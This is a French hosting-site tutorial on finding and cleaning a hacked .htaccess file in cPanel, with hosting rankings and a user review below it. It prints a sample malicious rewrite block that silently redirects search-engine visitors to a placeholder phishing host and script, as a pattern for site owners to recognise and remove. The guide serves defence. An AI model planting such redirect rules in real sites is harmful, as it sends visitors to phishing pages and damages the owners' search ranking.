Comment nettoyer un .htaccess hacké


Mis à jour le 17 septembre, 2020

Comment nettoyer un .htaccess hacké

Dans cet article nous allons discuter de mesures que vous pouvez prendre pour nettoyer et réparer un fichier .htaccess piraté.

Le fichier .htaccess est utilisé pour configurer principalement des règles pour contrôler la façon dont on accède à votre site.

Vous ne remarquerez peut-être pas que votre fichier .htaccess a été piraté jusqu'à ce qu'une enquête manuelle soit menée, ou jusqu'à ce que vous obteniez un avertissement de logiciels malveillants qui vous dit que votre site est redirigé vers un site malveillant.

Parfois, vous pouvez voir dans la barre d'état de votre navigateur Internet qu'un site Web étranger tente de charger du contenu sur votre site Web, ou vous remarquerez peut-être un avertissement dans votre navigateur Web.

Tous peuvent être des signes communs d'un hack du fichier .htaccess, vous pourriez remarquer également que vous avez perdu votre position dans le classement des moteurs de recherche.

C'est un cas typique où les pirates vont tenter de pirater votre fichier .htaccess de sorte que lorsque les robots des moteurs de recherche explorent votre site, ils sont redirigés vers le site Web que le pirate a mis en place au lieu du vôtre.

Vous pouvez faire un contrôle rapide depuis l'extérieur à l'aide de l'outil de Diagnostic Google pour savoir s'ils ont détecté quelque chose de malveillant sur votre site dans leur plus récente analyse.

Remplacez tout simplement VotreDomaine.com par votre vrai nom de domaine dans l'URL suivante:

http://google.com/safebrowsing/diagnostic?site=VotreDomaine.com

Vous pouvez en lire plus sur la page Outil de diagnostic Google.

Les étapes à suivre pour nettoyer le fichier .htacesss

En suivant les étapes ci-dessous vous pouvez apprendre à détecter un hack de .htaccess et à nettoyer votre fichier .htaccess si vous en détecter un.

Étape 1. Connectez-vous à cPanel

Étape 2. Sous la section Fichiers, cliquez sur Gestionnaire de Fichiers.

 gestionnaire de fichier dans cPanel

Étape 3. Sélectionnez l'option "Dossier Racine pour:" et sélectionnez votre domaine dans le menu déroulant.

 répertoire principal dans gestionnaire de fichier cpanel

Étape 4. Assurez-vous que "Montrer les fichiers cachés" est sélectionné

Étape 5. Cliquez sur "Allez"

Étape 6. Clique droit sur le fichier .htaccess et cliquez sur 'Éditer'

 ouvrir et editer un fichier .htaccess

Étape7. Vous pourriez avoir une fenêtre de dialogue qui vous propose de choisir l'encodage, cliquez sur "Edit" simplement

Étape 8. Défilez de haut en bas pour voir si un bout de code semble suspect; de toute manière vous verrez très probablement quelque chose de ce genre:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://SiteHameconnage.tld/fichier_hack.php?t=3 [R,L]
</IfModule>

Ce que ce code de réécriture essaie de faire c'est de vérifier le référent d'une requête, si c'est un moteur de recherche populaire, il le redirige vers leur site SiteHameconnage.tld et essaie de charger un script malicieux fichier_hack.php.

Parce que ces instructions conditionnelles RewriteCond ne  s’appliqueraient pas à vous, et seulement aux moteurs de recherche, ce genre de hacks peut passer sous l’incognito pendant longtemps. Et le plus longtemps ils sont actifs, le plus ils affectent votre classement dans les moteurs de recherche.

Étape9. Pour supprimer ces instructions malicieuses de réécriture, vous pouvez simplement mettre en surbrillance tout le texte et appuyer 'Supp' sur votre clavier et par la suite cliquer sur "Enregistrer les modifications" sur le coin droit du haut du fichier.

Si vous n'êtes pas certains à 100% d'avoir affaire à un code malicieux de redirection, nous vous recommandons de sauvegarder votre fichier .htaccess avant de l'éditer. Pour ce faire il suffit de faire un clic-droit sur le fichier .htaccess à l'intérieur du Gestionnaire de Fichiers et de cliquer sur Copier et ensuite choisir le chemin de copie comme /public_html/.htaccess-BAK, et finalement cliquer sur Copie de Fichier(s).

Vous devez maintenant avoir compris comment trouver et éliminer un hack du fichier .htaccess qui pourrait causer des redirections malicieuses sur votre site. Vous serez très certainement intéressé de lire à propos des "Étapes à suivre après une attaque : cas de Wordpress".




Rubriques des articles




Les avis des clients

Avis des utilisateurs


Faites entendre votre voix. Passez en revue votre fournisseur d'hébergement Web - bon ou mauvais.


Scandaleux. Leur logiciel comporte un renouvellement automatique. J'ai payé mon site pour une année supplémentaire suite à leur message de relance et le site m'a débité 2 fois. Après de nombreux courriers ils n'ont rien voulu entendre et ils ont refusé le remboursement de 68 euros. Bref une belle ar …

Sophie Vagnotti à propos LWS

Montrer une autre revue
Lire les avis LWS



Plans d'hébergement




Les plans d'hébergement de 43 sociétés d'hébergement partout dans le monde


Meilleur hébergeurs web

# hébergeur web prix action

1

Infomaniak France

6.75 EURO

Ajouter un Avis
Visiter

2

Hostpapa France

2.95 EURO

Ajouter un Avis
Visiter

3

Greengeeks

4.95 USD

Ajouter un Avis
Visiter

4

Siteground

6.95 USD

Ajouter un Avis
Visiter

5

Planethoster France

5.99 EURO

Ajouter un Avis
Visiter

6

Bluehost

6.95 USD

Ajouter un Avis
Visiter




Hébergeurs par avis de clients

Planethoster France
192 avis des clients
Hostpapa France
74 avis des clients
Infomaniak France
56 avis des clients
Rapidenet
50 avis des clients
Hostinger
47 avis des clients
Ajouter un avis Tous les profils


Hébergeurs par fidélité de clients

Planethoster France
187 / 192 recommandé
Infomaniak France
56 / 56 recommandé
Rapidenet
49 / 50 recommandé
Hostinger
44 / 47 recommandé
Hostpapa France
39 / 74 recommandé
Évaluer hébergeur Tous les profils


Question de la Semaine


Votre avis sur notre site



Contacter l'éditeur

Posez votre question